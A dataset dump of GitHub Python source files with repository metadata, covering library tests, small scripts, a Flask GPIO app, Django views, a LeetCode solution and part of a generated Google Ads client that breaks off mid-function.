blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bd78505b0cfbc80351ec303ebf0a8a3b65befbfb | 75d318b2f125ec1d08195f12f8cc3870b3aa3056 | /tests/importer/test_springer_dojson.py | 9842bcd989109623adacf2194c5674ceffdd1352 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | topless/cds-books | d496913da2fdbcc42bf7bc7987fe60f80d6af35a | e587fec6c191fddebce3c3f9f61aae625db31254 | refs/heads/master | 2023-01-24T19:19:25.923716 | 2020-11-25T13:20:48 | 2020-11-26T07:49:11 | 257,366,115 | 0 | 0 | MIT | 2020-04-20T18:12:40 | 2020-04-20T18:12:39 | null | UTF-8 | Python | false | false | 3,655 | py | import os
from cds_dojson.marc21.utils import create_record
from cds_ils.importer.providers.springer.springer import model
marcxml = (
"""<collection xmlns="http://www.loc.gov/MARC21/slim">"""
"""<record>{0}</record></collection>"""
)
def check_transformation(marcxml_body, json_body):
"""Check transformation."""
blob = create_record(marcxml.format(marcxml_body))
record = {}
record.update(**model.do(blob, ignore_missing=True))
expected = {}
expected.update(**json_body)
assert record == expected
def test_springer_transformation(app):
"""Test springer record import translation."""
dirname = os.path.join(os.path.dirname(__file__), "data")
with open(os.path.join(dirname, "springer_record.xml"), "r") as fp:
example = fp.read()
with app.app_context():
check_transformation(
example,
{
"_eitem": {
"internal_note": "Physics and Astronomy (R0) "
"(SpringerNature-43715)",
"urls": [
{
"description": "E-book by Springer",
"value": "https://doi.org/10.1007/b100336",
}
],
},
"provider_recid": "978-0-306-47915-1",
"_serial": [
{
"title": "Advances in Nuclear Physics ;",
"volume": "26",
}
],
"abstract": "The four articles ...",
"agency_code": "DE-He213",
"alternative_titles": [
{"type": "SUBTITLE", "value": "Volume 26 /"}
],
"alternative_identifiers": [
{"scheme": "SPRINGER", "value": "978-0-306-47915-1"}
],
"authors": [
{"full_name": "Negele, J.W.", "roles": ["EDITOR"]},
{"full_name": "Vogt, Erich W.", "roles": ["EDITOR"]},
],
"document_type": "BOOK",
"edition": "1st ed. 2001.",
"identifiers": [
{"scheme": "ISBN", "value": "9780306479151"},
{"scheme": "ISBN", "value": "9780306479151X"},
],
"imprint": {
"date": "2001.",
"place": "New York, NY :",
"publisher": "Springer US :, Imprint: Springer,",
},
"keywords": [
{"source": "SPR", "value": "Nuclear physics."},
{"source": "SPR", "value": "Heavy ions."},
{
"source": "SPR",
"value": "Nuclear Physics, Heavy Ions, Hadrons.",
},
],
"number_of_pages": "386",
"publication_year": "2001.",
"subjects": [
{"scheme": "LoC", "value": "QC770-798"},
{"scheme": "LoC", "value": "QC702.7.H42"},
{"scheme": "Dewey", "value": "539.7092"},
],
"table_of_content": [
"The Spin Structure of the Nucleon",
"Liquid-Gas Phase Transition in Nuclear "
"Multifragmentation",
"High Spin Properties of Atomic Nuclei",
"The Deuteron: Structure and Form Factors.",
],
"title": "Advances in Nuclear Physics",
},
)
| [
"38131488+kprzerwa@users.noreply.github.com"
] | 38131488+kprzerwa@users.noreply.github.com |
affe4860d2c5900e87b8d5ca7f0a608119533a85 | 46ac0965941d06fde419a6f216db2a653a245dbd | /sdks/python/test/test_DistributionGroupUserGetResponse.py | f382222ea7f9f529b0ed88420c679534d6be68a3 | [
"MIT",
"Unlicense"
] | permissive | b3nab/appcenter-sdks | 11f0bab00d020abb30ee951f7656a3d7ed783eac | bcc19c998b5f648a147f0d6a593dd0324e2ab1ea | refs/heads/master | 2022-01-27T15:06:07.202852 | 2019-05-19T00:12:43 | 2019-05-19T00:12:43 | 187,386,747 | 0 | 3 | MIT | 2022-01-22T07:57:59 | 2019-05-18T17:29:21 | Python | UTF-8 | Python | false | false | 1,066 | py | # coding: utf-8
"""
App Center Client
Microsoft Visual Studio App Center API # noqa: E501
OpenAPI spec version: preview
Contact: benedetto.abbenanti@gmail.com
Project Repository: https://github.com/b3nab/appcenter-sdks
"""
from __future__ import absolute_import
import unittest
import appcenter_sdk
from DistributionGroupUserGetResponse.clsDistributionGroupUserGetResponse import DistributionGroupUserGetResponse # noqa: E501
from appcenter_sdk.rest import ApiException
class TestDistributionGroupUserGetResponse(unittest.TestCase):
"""DistributionGroupUserGetResponse unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDistributionGroupUserGetResponse(self):
"""Test DistributionGroupUserGetResponse"""
# FIXME: construct object with mandatory attributes with example values
# model = appcenter_sdk.models.clsDistributionGroupUserGetResponse.DistributionGroupUserGetResponse() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"b3nab@users.noreply.github.com"
] | b3nab@users.noreply.github.com |
60c9114f98ec2437c232bbed5e91ca263ce743d2 | a6432a0443b0f32b68baa4632397bc83abb0dfd4 | /ugali/scratch/PlotValidation.py | 764c76c047d5df17b9d1da20201c34dfbead05b6 | [
"MIT"
] | permissive | norashipp/ugali | d795c016e52d8c9639b214bd83ca610d052cb10f | 812bd9222737b9ffd36cfc2f2d058d948fc0522a | refs/heads/master | 2021-01-19T17:06:08.030637 | 2016-07-08T14:14:57 | 2016-07-08T14:14:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,430 | py | #!/usr/bin/env python
from os.path import splitext,basename
import pylab as plt
import numpy as np
if __name__ == "__main__":
from optparse import OptionParser
usage = "Usage: %prog [options] input"
description = "python script"
parser = OptionParser(usage=usage,description=description)
(opts, args) = parser.parse_args()
for arg in args:
if splitext(arg)[1] != '.dat':
raise Exception('Input not .dat files')
params = basename(arg).split('_')
label = params[0]
ext = params[4]
s = ''.join(open(arg).readlines())
results = eval(s)
logLike = np.array(results['log_likelihood'])
low,rich,up = np.array([results['richness_lower'],
results['richness'],
results['richness_upper']])
mass = np.array(results['stellar_mass'])
norm = mass/rich
low *= norm
rich *= norm
up *= norm
plt.errorbar(range(len(rich)), rich, yerr=[rich-low, up-rich], fmt='o',label=label)
plt.axhline(np.mean(rich),ls='--',color='r')
for mc_mass in np.unique(results['mc_stellar_mass']):
plt.axhline(mc_mass,ls='--',color='k')
plt.title(r'Likelihood Comparison ($r_h = %s$ deg)'%ext)
plt.ylabel(r'Stellar Mass ($M_{\odot}$)')
plt.legend(loc='upper right')
plt.savefig("%s_%s.png"%(params[1],ext))
| [
"kadrlica@fnal.gov"
] | kadrlica@fnal.gov |
3166b0f241324912b43ecb7470e3cd06ddf95705 | 7d5641f61e9317984dc656ae43658f9f09a3d2c5 | /72.py | bec0164cd0e98e23a3695b3ae6615592e2bebae6 | [
"MIT"
] | permissive | r9y9/nlp100 | 51ec6b1a13128a53eeda9ff110d122211f0fceba | 391ca6c4fb8afc074ed825404d4ad4efc4467f05 | refs/heads/master | 2021-01-25T09:00:54.021853 | 2017-06-09T17:32:52 | 2017-06-09T17:32:52 | 93,770,527 | 18 | 8 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | from stemming.porter2 import stem
import sys
import numpy as np
vocab = {}
with open("sentiment.txt") as f:
lines = f.readlines()
for line in lines:
line = line[:-1].lower()
words = line.split(" ")[1:]
words = list(map(stem, words))
for word in words:
if word in vocab:
vocab[word] += 1
else:
vocab[word] = 1
def build_idx(vocab):
word2idx = {}
count = 0
for k, v in vocab.items():
word2idx[k] = count
count += 1
assert count == len(vocab)
return word2idx
def sentence2features(words, vocab, word2idx):
N = len(vocab)
x = np.zeros(N, dtype=np.int)
for word in words:
idx = word2idx[word]
x[idx] += 1
return x
K = 13
stopwords = sorted(vocab.items(), key=lambda x: x[1])[:: -1][: K]
for k, v in stopwords:
print(k, v)
stopwords_dict = dict(stopwords)
print(len(vocab))
print(vocab.get("like"))
word2idx = build_idx(vocab)
def is_stopword(x, stopwords_dict=stopwords_dict):
if x in stopwords_dict:
return True
return False
def is_not_stopword(x, stopwords_dict=stopwords_dict):
return not is_stopword(x, stopwords_dict)
X = []
Y = []
with open("sentiment.txt") as f:
lines = f.readlines()
for line in lines:
line = line[: -1].lower()
y, words = line.split(" ")[0], line.split(" ")[1:]
y = 0 if (y == "+1") else 1
words = list(map(stem, words))
words = list(filter(is_not_stopword, words))
x = sentence2features(words, vocab, word2idx)
X.append(x)
Y.append(y)
X = np.array(X)
Y = np.array(Y)
print(X.shape)
print(Y.shape)
sys.exit(0)
| [
"zryuichi@gmail.com"
] | zryuichi@gmail.com |
603f0a1c5a4fbe205d9f940387c07dbb827e0755 | d780df6e068ab8a0f8007acb68bc88554a9d5b50 | /python/g1/messaging/tests/test_servers.py | 712fd78186bd0542a9ffc468cae2f57cbe9277a7 | [
"MIT"
] | permissive | clchiou/garage | ed3d314ceea487b46568c14b51e96b990a50ed6f | 1d72863d3a5f5d620b170f4dd36f605e6b72054f | refs/heads/master | 2023-08-27T13:57:14.498182 | 2023-08-15T07:09:57 | 2023-08-15T19:53:52 | 32,647,497 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,217 | py | import unittest
import unittest.mock
import uuid
from g1.asyncs import kernels
from g1.asyncs.bases import tasks
from g1.messaging import reqrep
from g1.messaging.reqrep import clients
from g1.messaging.reqrep import servers
from g1.messaging.wiredata import jsons
class InvalidRequestError(Exception):
pass
class InternalServerError(Exception):
pass
@reqrep.raising(InvalidRequestError, InternalServerError)
class TestInterface:
@reqrep.raising(ValueError)
def greet(self, name: str) -> str:
raise NotImplementedError
def f(self):
raise NotImplementedError
def g(self):
raise NotImplementedError
def h(self):
raise NotImplementedError
@reqrep.raising(InternalServerError)
class TestOnlyOneError:
def f(self):
raise NotImplementedError
# Don't inherit from ``TestInterface`` because we intentionally leave
# out ``f`` unimplemented.
class TestApplication:
# pylint: disable=no-self-use
async def greet(self, name):
return 'Hello, %s' % name
async def g(self):
return object()
async def h(self):
# Test error that is not declared in the interface.
raise RuntimeError
Request, Response = reqrep.generate_interface_types(TestInterface, 'Test')
WIRE_DATA = jsons.JsonWireData()
class ServerTest(unittest.TestCase):
def test_only_one_error(self):
request_type, response_type = \
reqrep.generate_interface_types(TestOnlyOneError)
server = servers.Server(
TestOnlyOneError(),
request_type,
response_type,
WIRE_DATA,
)
self.assertEqual(
server._declared_error_types,
{InternalServerError: 'internal_server_error'},
)
@kernels.with_kernel
def test_serve(self):
server = servers.Server(
TestApplication(),
Request,
Response,
WIRE_DATA,
invalid_request_error=InvalidRequestError(),
internal_server_error=InternalServerError(),
)
wire_request = WIRE_DATA.to_lower(
Request(args=Request.m.greet(name='world'))
)
self.assertEqual(
WIRE_DATA.to_upper(
Response,
kernels.run(server._serve(wire_request)),
),
Response(result=Response.Result(greet='Hello, world')),
)
with self.assertLogs(servers.__name__, level='DEBUG') as cm:
self.assertEqual(
kernels.run(server._serve(b'')),
server._invalid_request_error_wire,
)
self.assertRegex('\n'.join(cm.output), r'to_upper error: ')
wire_request = WIRE_DATA.to_lower(Request(args=Request.m.f()))
with self.assertLogs(servers.__name__, level='DEBUG') as cm:
self.assertEqual(
kernels.run(server._serve(wire_request)),
server._invalid_request_error_wire,
)
self.assertRegex('\n'.join(cm.output), r'unknown method: f: ')
wire_request = WIRE_DATA.to_lower(Request(args=Request.m.g()))
with self.assertLogs(servers.__name__, level='DEBUG') as cm:
self.assertEqual(
kernels.run(server._serve(wire_request)),
server._internal_server_error_wire,
)
self.assertRegex('\n'.join(cm.output), r'to_lower error: ')
wire_request = WIRE_DATA.to_lower(Request(args=Request.m.h()))
with self.assertLogs(servers.__name__, level='DEBUG') as cm:
self.assertEqual(
kernels.run(server._serve(wire_request)),
server._internal_server_error_wire,
)
self.assertRegex('\n'.join(cm.output), r'server error: ')
@kernels.with_kernel
def test_end_to_end(self):
def do_test(client, server, server_serve):
url = 'inproc://%s' % uuid.uuid4()
server.socket.listen(url)
client.socket.dial(url)
server_task = tasks.spawn(server_serve)
client_task = tasks.spawn(client.m.greet(name='world'))
with self.assertRaises(kernels.KernelTimeout):
kernels.run(timeout=0.005)
self.assertTrue(client_task.is_completed())
self.assertEqual(
client_task.get_result_nonblocking(), 'Hello, world'
)
self.assertFalse(server_task.is_completed())
server.socket.close()
kernels.run(timeout=1)
self.assertTrue(server_task.is_completed())
self.assertIsNone(server_task.get_result_nonblocking())
app = TestApplication()
with servers.Server(app, Request, Response, WIRE_DATA) as server:
with clients.Client(Request, Response, WIRE_DATA) as client:
do_test(client, server, server.serve)
app = TestApplication()
server = servers.Server(app, Request, Response, WIRE_DATA)
with clients.Client(Request, Response, WIRE_DATA) as client:
with server:
do_test(client, server, server.serve)
if __name__ == '__main__':
unittest.main()
| [
"clchiou@gmail.com"
] | clchiou@gmail.com |
e17e6c8ecbe5505cbafb9db285c12c2de832cc48 | 62def70e2d802375b1ad28b0ac85fee2010ee0a9 | /flask/server/app2-BBIO.py | 6f563a5c2b1d5a7dd221b84ec1d0f31098dcec96 | [] | no_license | MarkAYoder/BeagleBoard-exercises | c48028b6e919d8c04dedfd2040a133c760f0f567 | 2fab7c7f7aa09bf101168dfb279e690bc43a6514 | refs/heads/master | 2023-07-22T08:06:19.482358 | 2023-07-12T19:24:51 | 2023-07-12T19:24:51 | 5,111,513 | 48 | 41 | null | 2021-07-29T18:02:29 | 2012-07-19T15:07:14 | JavaScript | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env python3
# From: https://towardsdatascience.com/python-webserver-with-flask-and-raspberry-pi-398423cc6f5d
'''
Raspberry Pi GPIO Status and Control
'''
import Adafruit_BBIO.GPIO as GPIO
from flask import Flask, render_template
app = Flask(__name__)
button = "P9_11"
buttonSts = GPIO.LOW
# Set button as an input
GPIO.setup(button, GPIO.IN)
@app.route("/")
def index():
# Read Button Status
buttonSts = GPIO.input(button)
templateData = {
'title' : 'GPIO input Status!',
'button' : buttonSts,
}
return render_template('index2.html', **templateData)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8081, debug=True) | [
"Mark.A.Yoder@Rose-Hulman.edu"
] | Mark.A.Yoder@Rose-Hulman.edu |
346179e283175d7b6d77bf0f1c6eb55cd7503df9 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/2/fc8.py | 4b833c69ff0ca02bdfddeccb42554670e3953c1a | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'fC8':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
233f0d40f307d09932e85c5edd77a34aeee76a96 | d0efa2026b7ed22ff4f9aa76c27ae2474c30f26d | /test/test_footer.py | 3535a50683a08f16c069762bca0020279cf550fd | [] | no_license | begum-akbay/Python | 2075650e0ddbf1c51823ebd749742646bf221603 | fe8b47e29aae609b7510af2d21e53b8a575857d8 | refs/heads/master | 2023-03-28T00:11:00.997194 | 2021-03-25T16:38:17 | 2021-03-25T16:38:17 | 351,499,957 | 0 | 0 | null | 2021-03-25T16:38:17 | 2021-03-25T16:15:16 | Python | UTF-8 | Python | false | false | 1,022 | py | # coding: utf-8
"""
Payment Gateway API Specification.
The documentation here is designed to provide all of the technical guidance required to consume and integrate with our APIs for payment processing. To learn more about our APIs please visit https://docs.firstdata.com/org/gateway. # noqa: E501
The version of the OpenAPI document: 21.1.0.20210122.001
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import openapi_client
from openapi_client.models.footer import Footer # noqa: E501
from openapi_client.rest import ApiException
class TestFooter(unittest.TestCase):
"""Footer unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testFooter(self):
"""Test Footer"""
# FIXME: construct object with mandatory attributes with example values
# model = openapi_client.models.footer.Footer() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"emargules@bluepay.com"
] | emargules@bluepay.com |
65fc44fd2cb52915fa25c53464419caacae2ac56 | 2b6fa34dac030ec1f2918b1377956bf791219d22 | /leetcode/medium/search-a-2d-matrix.py | 172983011abfef17fc0165532c2d6bed9454af6f | [
"MIT"
] | permissive | rainzhop/cumulus-tank | aa13fb8f14c27893838a67d2eb69fdd2ac3d6450 | 09ebc7858ea53630e30606945adfea856a80faa3 | refs/heads/master | 2020-06-06T23:24:37.498966 | 2020-01-06T09:52:16 | 2020-01-06T09:52:16 | 192,874,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,074 | py | # https://leetcode.com/problems/search-a-2d-matrix/
#
# Write an efficient algorithm that searches for a value in an m x n matrix.
# This matrix has the following properties:
#
# Integers in each row are sorted from left to right.
# The first integer of each row is greater than the last integer of the previous row.
#
# For example,
# Consider the following matrix:
# [
# [1, 3, 5, 7],
# [10, 11, 16, 20],
# [23, 30, 34, 50]
# ]
# Given target = 3, return true.
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
m = len(matrix)
left, right = 0, m - 1
if target < matrix[0][0] or target > matrix[-1][-1]:
return False
while left != right:
mid = (left + right) / 2
if target < matrix[mid][-1]:
right = mid
else:
left = mid + 1
if target in matrix[left]:
return True
else:
return False
| [
"rainzhop@gmail.com"
] | rainzhop@gmail.com |
87565ac9145b88260426230d9548b3bfc3db3b37 | edbb63696580638af0084ee318d2c9bc9e8c7e79 | /text_wc_2.py | 8cd11af58e5aef643a13ed0776bd13036ca2bad0 | [] | no_license | awaddell77/Scrapers | fef34e34b8e039f4992497cae75135cdb57b2581 | 0a36fb2c99f2d7b90533834b29c0ba8f27c13a85 | refs/heads/master | 2020-05-21T13:44:06.524855 | 2020-03-16T23:00:45 | 2020-03-16T23:00:45 | 62,753,048 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 483 | py | def text_wc(x,output='listoutput.txt', directory = 'C:\\Users\\Owner\\', v = 0):#takes list writes to text
n_l = x
name = directory + output
with open(name, 'w') as wf:
for i in range(0, len(n_l)):
if v != 0:
print(n_l[i])
new = n_l[i]
wf.writelines(new)
else:
new = n_l[i]
wf.writelines(new)
print("%s saved to %s" % (output, directory))
return True | [
"waddell.andrew@gmail.com"
] | waddell.andrew@gmail.com |
7b296749e9a4ef07b6b90aa915c8778c1bd21a26 | 9f951479d5eda96e7fecbbbd0b3b7e4f5e83360d | /webtest/全栈课程代码学员版/Level2Code/Level2Code/lesson6URL/LessonCode/firstsite/firstapp/views.py | 8f9b6e20978ccae64d476c71c7351b075f6ff647 | [] | no_license | lianbo2006/Project | 44c5b6fcab4fe31b80bfff467b3e0e31fd2da8ba | 5d13923817a1d4cffe7d4abbb5873277ce28bb87 | refs/heads/master | 2021-01-11T18:24:47.597849 | 2017-04-25T03:44:47 | 2017-04-25T03:44:47 | 79,539,300 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | from django.shortcuts import render, HttpResponse, redirect
from firstapp.models import Aritcle, Comment
from django.template import Context, Template
from firstapp.form import CommentForm
def index(request):
print(request)
print('==='*30)
print(dir(request))
print('==='*30)
print(type(request))
queryset = request.GET.get('tag')
if queryset:
article_list = Aritcle.objects.filter(tag=queryset)
else:
article_list = Aritcle.objects.all()
context = {}
context['article_list'] = article_list
index_page = render(request, 'first_web_2.html', context)
return index_page
def detail(request, page_num, error_form=None):
context = {}
form = CommentForm
a = Aritcle.objects.get(id=page_num)
best_comment = Comment.objects.filter(best_comment=True, belong_to=a)
if best_comment:
context['best_comment'] = best_comment[0]
article = Aritcle.objects.get(id=page_num)
context['article'] = article
# context['comment_list'] = comment_list
if error_form is not None:
context['form'] = error_form
else:
context['form'] = form
return render(request, 'article_detail.html', context)
def detail_comment(request, page_num):
form = CommentForm(request.POST)
if form.is_valid():
name = form.cleaned_data['name']
comment = form.cleaned_data['comment']
a = Aritcle.objects.get(id=page_num)
c = Comment(name=name, comment=comment, belong_to=a)
c.save()
else:
return detail(request, page_num, error_form=form)
return redirect(to='detail', page_num=page_num)
| [
"513748889@qq.com"
] | 513748889@qq.com |
77080eb1b0672d0647b0341846a888bc476e3a0a | d18d7f86a1e701caada063d09ee00fe08a95e353 | /test/kapp/sys/ys/calc/calc_mpi_openmp_stategen/intel/runtest.py | 047f4715d694e464ec32c28be77152923524d7a0 | [
"BSD-3-Clause"
] | permissive | E3SM-Project/KGen | 2e097b2ef979b42b094089f337d49240838aa13b | c0035c93d21286da6519a74ff527b6a009781de4 | refs/heads/master | 2021-02-14T00:01:10.939108 | 2020-06-15T18:49:58 | 2020-06-15T18:49:58 | 244,747,822 | 3 | 0 | NOASSERTION | 2020-03-03T21:43:57 | 2020-03-03T21:43:56 | null | UTF-8 | Python | false | false | 1,790 | py | import sys
from kapp_sys_ys_calc_calc_mpi_openmp_stategen_test import KAppSysYSCalcCOSTest
import time
class Test(KAppSysYSCalcCOSTest):
def generate(self, myname, result):
workdir = result['mkdir_task']['workdir']
tmpsrc = result['download_task']['tmpsrc']
srcfile = '%s/bridge_mod.F90'%tmpsrc
prerun = 'module swap intel intel/16.0.1; module try-load impi/5.0.1.035'
passed, out, err = self.extract_kernel(srcfile, None, \
__cmd_clean='"cd %s; make -f Makefile.mpirun clean"'%tmpsrc, \
__cmd_build='"cd %s; make -f Makefile.mpirun build"'%tmpsrc, \
__cmd_run='"cd %s; make -f Makefile.mpirun run"'%tmpsrc, \
__invocation='0-1:0:1,2-3:0:3', \
__timing='repeat=1', \
__prerun='build="%s",run="%s"'%(prerun, prerun), \
__mpi='enable', \
__openmp='enable,omp_num_threads=10', \
__rebuild='state', \
__outdir=workdir)
#__debug='printvar=:i,:j,:output',
result[myname]['stdout'] = out
result[myname]['stderr'] = err
result[myname]['datadir'] = '%s/data'%workdir
if passed:
result[myname]['statefiles'] = ['update.0.0.1', 'update.1.0.1', 'update.2.0.3', 'update.3.0.3' ]
self.set_status(result, myname, self.PASSED)
else:
result[myname]['statefiles'] = []
self.set_status(result, myname, self.FAILED, 'STDOUT: %s\nSTDERR: %s'%(out, err))
return result
if __name__ == "__main__":
# we may allow to run this test individually
print('Please do not run this script from command line. Instead, run this script through KGen Test Suite .')
print('Usage: cd ${KGEN_HOME}/test; ./kgentest.py')
sys.exit(-1)
| [
"youngsun@ucar.edu"
] | youngsun@ucar.edu |
67281564909457dc70bb7145aa9e43a1ee83e5a7 | d1bca991935232035b5a373e7b9199a73182fa3f | /0x09-utf8_validation/0-validate_utf8.py | 68d494f4f9fb3e74f157dc50405c7d48f6fa0897 | [] | no_license | felipeserna/holbertonschool-interview | 49ab15a099f5bf29e19d33e4ef738df4fd99d446 | d42763f7a82e551c9effcf2f0e9cf60f959559cd | refs/heads/main | 2023-07-14T08:28:52.457126 | 2021-08-26T16:14:50 | 2021-08-26T16:14:50 | 319,788,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | #!/usr/bin/python3
"""
Determines if a given data set represents a valid UTF-8 encoding
"""
def validUTF8(data):
"""
Return: True if data is a valid UTF-8 encoding, else return False
"""
try:
bytes(number & 0xFF for number in data).decode()
return True
except UnicodeDecodeError:
return False
| [
"feserna86@gmail.com"
] | feserna86@gmail.com |
a51a1efb119669822af956ee1e58c9ac91795d6f | c16ea32a4cddb6b63ad3bacce3c6db0259d2bacd | /google/ads/googleads/v5/googleads-py/google/ads/googleads/v5/services/services/shopping_performance_view_service/client.py | 4acced62df938f070c61171501f714223c0d70f9 | [
"Apache-2.0"
] | permissive | dizcology/googleapis-gen | 74a72b655fba2565233e5a289cfaea6dc7b91e1a | 478f36572d7bcf1dc66038d0e76b9b3fa2abae63 | refs/heads/master | 2023-06-04T15:51:18.380826 | 2021-06-16T20:42:38 | 2021-06-16T20:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,536 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v5.resources.types import shopping_performance_view
from google.ads.googleads.v5.services.types import shopping_performance_view_service
from .transports.base import ShoppingPerformanceViewServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import ShoppingPerformanceViewServiceGrpcTransport
class ShoppingPerformanceViewServiceClientMeta(type):
"""Metaclass for the ShoppingPerformanceViewService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[ShoppingPerformanceViewServiceTransport]]
_transport_registry['grpc'] = ShoppingPerformanceViewServiceGrpcTransport
def get_transport_class(cls,
label: str = None,
) -> Type[ShoppingPerformanceViewServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class ShoppingPerformanceViewServiceClient(metaclass=ShoppingPerformanceViewServiceClientMeta):
"""Service to fetch Shopping performance views."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = 'googleads.googleapis.com'
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ShoppingPerformanceViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ShoppingPerformanceViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs['credentials'] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> ShoppingPerformanceViewServiceTransport:
"""Return the transport used by the client instance.
Returns:
ShoppingPerformanceViewServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def shopping_performance_view_path(customer: str,) -> str:
"""Return a fully-qualified shopping_performance_view string."""
return "customers/{customer}/shoppingPerformanceView".format(customer=customer, )
@staticmethod
def parse_shopping_performance_view_path(path: str) -> Dict[str,str]:
"""Parse a shopping_performance_view path into its component segments."""
m = re.match(r"^customers/(?P<customer>.+?)/shoppingPerformanceView$", path)
